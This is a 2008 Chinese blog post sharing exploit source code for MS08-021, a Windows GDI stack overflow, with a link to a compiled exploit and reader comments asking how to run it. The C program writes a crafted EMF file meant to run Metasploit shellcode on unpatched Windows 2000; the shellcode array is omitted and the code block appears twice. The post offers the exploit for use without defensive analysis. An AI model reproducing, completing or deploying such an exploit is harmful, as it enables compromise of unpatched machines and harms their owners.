崩溃-郁闷-心疼
负载均衡技术浅谈之DNS负载均衡优缺点
April 17, 2008 11:22 | by
PS:很好很强大..下面附了编译好的exp ··
Download ( 905 downloads)
///Exploit the MS08-021 : Stack Overflow on GDI API
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
/// automatically run calc.exe in Win2kSP4 CHS Version
/// with MS07-046 patched but no MS08-021 is installed.
/// In Windows XP SP2, explorer.exe will crashed but
/// calc will not be run.
/////////////////////////////////////////////////////////////
#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
//中间shellcode太长 省略掉 //T4nk upx.com.cn
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
int _tmain(int argc, _TCHAR* argv[])
{
printf("/////////////////////////////////////////////////////////////\n\
///Exploit the MS08-021 : Stack Overflow on GDI API\n\
///Author: Lamhtz\n\
///Date: April 14th, 2008\n\
///Usage: <appname.exe> [filename]\n\
///Your filename must end with .emf\n\
/////////////////////////////////////////////////////////\n");
if (argc != 2)
{
printf("Usage: <appname.exe> [filename]\n");
exit(0);
}
FILE *stream;
if( fopen_s( &stream, argv[1], "w+b" ) == 0 )
{
printf("Generating %s....\n", argv[1]);
fwrite( data, sizeof(data) ,1 , stream );
printf( "%s created ! \n", argv[1] );
fclose( stream );
}
else
{
printf("File Created Failure ! \n");
exit(-1);
}
return 0;
}
///Author: Lamhtz
///Date: April 14th, 2008
///Usage: <appname.exe> [filename]
///Function: Generate a crafted emf file which could
/// automatically run calc.exe in Win2kSP4 CHS Version
/// with MS07-046 patched but no MS08-021 is installed.
/// In Windows XP SP2, explorer.exe will crashed but
/// calc will not be run.
/////////////////////////////////////////////////////////////
#include "stdlib.h"
/////////////////////////////////////////////////////////////
///The raw EMF data.
///Shellcode included.(Metasploit)
/////////////////////////////////////////////////////////////
//中间shellcode太长 省略掉 //T4nk upx.com.cn
/////////////////////////////////////////////////////////////
///The main function to generate the EMF file
/////////////////////////////////////////////////////////////
int _tmain(int argc, _TCHAR* argv[])
{
printf("/////////////////////////////////////////////////////////////\n\
///Exploit the MS08-021 : Stack Overflow on GDI API\n\
///Author: Lamhtz\n\
///Date: April 14th, 2008\n\
///Usage: <appname.exe> [filename]\n\
///Your filename must end with .emf\n\
/////////////////////////////////////////////////////////\n");
if (argc != 2)
{
printf("Usage: <appname.exe> [filename]\n");
exit(0);
}
FILE *stream;
if( fopen_s( &stream, argv[1], "w+b" ) == 0 )
{
printf("Generating %s....\n", argv[1]);
fwrite( data, sizeof(data) ,1 , stream );
printf( "%s created ! \n", argv[1] );
fclose( stream );
}
else
{
printf("File Created Failure ! \n");
exit(-1);
}
return 0;
}
Download ( 905 downloads)
yifan 
April 21, 2008 09:18
问一个比较傻的问题啊!有了shellcode 用什么工具编译啊!
zaroty
April 17, 2008 13:00
貌似我比较傻啊。。给了源码和Exploit 都不知道怎么用。。。我只能生成一个emf文件。。并且没有效果,
zaroty
April 17, 2008 12:54
Overflow...偶没看到效果啊、、
Pages: 1/1 
1 
1
